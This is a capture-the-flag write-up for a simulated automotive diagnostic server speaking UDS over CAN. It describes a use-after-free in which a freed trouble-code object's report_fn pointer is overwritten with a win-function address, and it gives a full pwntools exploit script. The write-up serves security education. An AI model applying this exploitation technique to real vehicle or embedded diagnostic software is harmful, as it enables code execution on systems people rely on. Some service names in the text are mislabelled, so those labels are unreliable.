Solution
The server implements the CAN protocol. We can call different diagnostic trouble codes (DTCs):
0x10 - DiagnosticSessionControl
0x27 - SecurityAccess
0x22 - ReadDataByIdentifier
0x2E - WriteDataByIdentifier
0x31 - RoutineControl
0x14 - ClearDiagnosticInformation */
0x19 - ReadDTCInformation */
0x34 - RequestDownload (register a new DTC) */
0x36 - TransferData (append description to a DTC entry) */
The binary has a predictable win function, that we need to call, in order to get the flag.
The ClearDiagnosticInformation DTC calls free on a custom DTC object, while the ReadDTCInformation still allows us to read it.
This is useful, as the ReadDTCInformation calls dtc->report_fn, if present.
Using the RoutineControl DTC, we can start an extended write for a data identifier to then write on that freed object. If we look at the structs, we can see that the DID data section can write to the place where the report_fn needs to be.
In order to do anything though, we need to switch our session type:
/* 0x34 - RequestDownload (register a new DTC) */
static void handle_request_download(uint8_t *data, uint8_t len) {
if (session.session_type == SESSION_DEFAULT) {
send_negative_response(SID_REQUEST_DOWNLOAD, NRC_CONDITIONS_NOT_CORRECT);
return;
}
This can be done by calling DiagnosticSessionControl with the 0x3 flag for SESSION_EXTENDED. Then, we:
- Register DTC using
RequestDownload - Clear all DTCs using
ClearDTC - Start extended write using
RoutineControl - Write 4 times to write all 12 bytes of the payload (we can only write 3 bytes per call)
- Call
ReadDTCto get the flag
The exploit looks like this:
from ctypes import *
from pwn import *
class can_frame(Structure):
_fields_ = [
("can_id", c_uint32),
("can_dlc", c_uint8),
("__pad", c_uint8),
("__res", c_uint8),
("__res1", c_uint8),
("data", c_uint8 * 8),
]
def _asdict(self):
d = {field[0]: getattr(self, field[0]) for field in self._fields_}
d["data"] = list(d["data"])
return d
def __repr__(self):
values = ", ".join(f"{k}={v}" for k, v in self._asdict().items())
return f"<{self.__class__.__name__}: {values}>"
CAN_SFF_MASK = 0x000007FF # standard frame format (SFF)
UDS_REQUEST_ID = 0x7DF # Broadcast request
UDS_PHYSICAL_ID = 0x7E0 # Physical request to this ECU
UDS_RESPONSE_ID = 0x7E8 # ECU response
r = remote("localhost", "18088")
#r = remote('6441ade8-db8e-4a89-8802-02329e35aaa5.challs.qualifier.swiss-hacking-challenge.ch', 31337, ssl=True)
def snr(r, frame):
r.send(bytes(frame))
data = bytearray(r.recv(16))
frame = can_frame.from_buffer(data)
return frame
def switch_session(r):
frame = can_frame()
frame.can_id = CAN_SFF_MASK & 0x7DF
frame.data[0] = 0x2 # len
frame.data[1] = 0x10 # DiagnosticSessionControl
frame.data[2] = 0x03 # SESSION_EXTENDED
return snr(r,frame)
def register_dtc(r):
frame = can_frame()
frame.can_id = CAN_SFF_MASK & 0x7DF
frame.data[0] = 0x7 # len
frame.data[1] = 0x34 # RequestDownload
frame.data[2] = 0x00 # severity
frame.data[3] = 0x0 # dtc_code
frame.data[4] = 0x0
frame.data[5] = 0x0
frame.data[6] = 0x1 # status
return snr(r,frame)
def clear_dtc(r):
frame = can_frame()
frame.can_id = CAN_SFF_MASK & 0x7DF
frame.data[0] = 0x4 # len
frame.data[1] = 0x14 # ClearDiagnosticInformation
frame.data[2] = 0xFF # group
frame.data[3] = 0xFF
frame.data[4] = 0xFF
return snr(r,frame)
def get_flag(r):
frame = can_frame()
frame.can_id = CAN_SFF_MASK & 0x7DF
frame.data[0] = 0x4 # len
frame.data[1] = 0x19 # ReadDTCInfo
frame.data[2] = 0x02
frame.data[3] = 0xFF
frame.data[4] = 0x0
frame.data[5] = 0x1
return snr(r,frame)
def rcStart(r):
frame = can_frame()
frame.can_id = CAN_SFF_MASK & 0x7DF
frame.data[0] = 0x7 # len
frame.data[1] = 0x31 # ReadDTCInfo
frame.data[2] = 0x01
frame.data[3] = 0xFF
frame.data[4] = 0x01
frame.data[5] = 0x0
frame.data[6] = 0x1
frame.data[7] = 12 # total length to write
return snr(r,frame)
def rcWrite(r):
payload = bytearray(
p8(0x1) + # status
p8(0x00) + # severity
p16(0x00) + # occurrence_count
p64(0x4016CF) # flag
)
# pls forgive me
for i in range(4):
frame = can_frame()
frame.can_id = CAN_SFF_MASK & 0x7DF
frame.data[0] = 0x7
frame.data[1] = 0x31 # ReadDTCInfo
frame.data[2] = 0x03
frame.data[3] = 0xFF
frame.data[4] = 0x01
frame.data[5] = payload.pop(0)
frame.data[6] = payload.pop(0)
frame.data[7] = payload.pop(0)
snr(r,frame)
def getdata(r):
data = bytearray(r.recv(16))
frame = can_frame.from_buffer(data)
return frame
switch_session(r)
register_dtc(r)
clear_dtc(r)
rcStart(r)
rcWrite(r)
get_flag(r)
while True:
a = getdata(r)
print("".join([chr(x) for x in list(a.data)[1:]]), end="")
Flag: